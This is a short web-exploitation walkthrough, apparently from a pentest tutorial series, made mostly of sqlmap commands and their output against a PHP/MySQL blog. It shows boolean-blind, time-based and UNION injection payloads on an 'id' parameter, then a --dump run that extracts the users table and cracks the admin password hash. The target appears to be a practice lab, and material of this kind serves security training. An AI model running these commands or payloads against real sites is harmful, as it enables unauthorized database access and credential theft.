10.3 : Web app exploitation - SQL injection (Part III)

Basic SQLmap Cracking

root@kali:/etc/nginx# sqlmap -u "" --forms
 ___ ___["]_____ ___ ___  {1.3.8#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is
illegal. It is the end user's responsibility to obey all applicable local, state and federal
 laws. Developers assume no liability and are not responsible for any misuse or damage cause
d by this program

[*] starting @ 20:04:36 /2019-11-05/

[20:04:36] [INFO] testing connection to the target URL
[20:04:36] [INFO] heuristics detected web page charset 'ascii'
[20:04:36] [INFO] searching for forms
[#1] form:
POST data: title=
do you want to test this form? [Y/n/q]
[20:04:46] [INFO] using '/root/.sqlmap/output/results-11052019_0804pm.csv' as the CSV result
s file in multiple targets mode
[20:04:46] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to ''. Do you want to follow
[20:04:55] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:04:55] [INFO] testing if the target URL content is stable
[20:04:55] [WARNING] POST parameter 'title' does not appear to be dynamic
[20:04:55] [WARNING] heuristic (basic) test shows that POST parameter 'title' might not be i
[20:04:58] [INFO] testing for SQL injection on GET parameter 'id'
[20:04:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:04:58] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:04:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP B
Y clause (FLOOR)'
[20:04:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:04:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING cla
use (IN)'
[20:04:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:04:58] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:04:58] [INFO] testing 'MySQL inline queries'
[20:04:58] [INFO] testing 'PostgreSQL inline queries'
[20:04:58] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:04:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:04:58] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:04:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:04:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:04:58] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:04:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[20:04:58] [INFO] testing 'Oracle AND time-based blind'
[20:04:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:04:58] [WARNING] GET parameter 'id' does not seem to be injectable
[20:04:58] [ERROR] all tested parameters do not appear to be injectable. Try to increase val
ues for '--level'/'--risk' options if you wish to perform more tests. If you suspect that th
ere is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use opti
on '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent', skipping to th
e next form
[20:04:58] [INFO] you can find results of scanning in multiple targets mode inside the CSV f
ile '/root/.sqlmap/output/results-11052019_0804pm.csv'
[20:04:58] [WARNING] you haven't updated sqlmap for more than 95 days!!!

[*] ending @ 20:04:58 /2019-11-05/

Basic injection doesnt seems working.

Lets crack it deeper..

sqlmap -u "" --cookie="PHPSESSID=pgtggk7cnqjeh8c4mi9l0k7on5"
 [20:08:07] [WARNING] parameter length constraining mechanism detected (e.g. Suho
sin patch). Potential problems in enumeration phase can be expected
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
sqlmap identified the following injection point(s) with a total of 55 HTTP(s) re
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1655=1655

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 8306 FROM (SELECT(SLEEP(5)))SjzK)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=-5519 UNION ALL SELECT NULL,NULL,CONCAT(0x717a627a71,0x737641445
6b71),NULL-- fAxL
[20:08:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.12
[20:08:12] [INFO] fetched data logged to text files under '/root/.sqlmap/output/'
[20:08:12] [WARNING] you haven't updated sqlmap for more than 95 days!!!

[*] ending @ 20:08:12 /2019-11-05/

We have a great result.

Now lets try to dump it and crack it.

sqlmap -u "" --cookie="PHPSESSID=pgtggk7cnqjeh8c4mi9l0k7on5" --dump

[20:10:06] [INFO] cracked password 'P4ssw0rd' for user 'admin'
Database: blog
Table: users
[1 entry]
| id | login | password                                    |
| 1  | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |

Got it.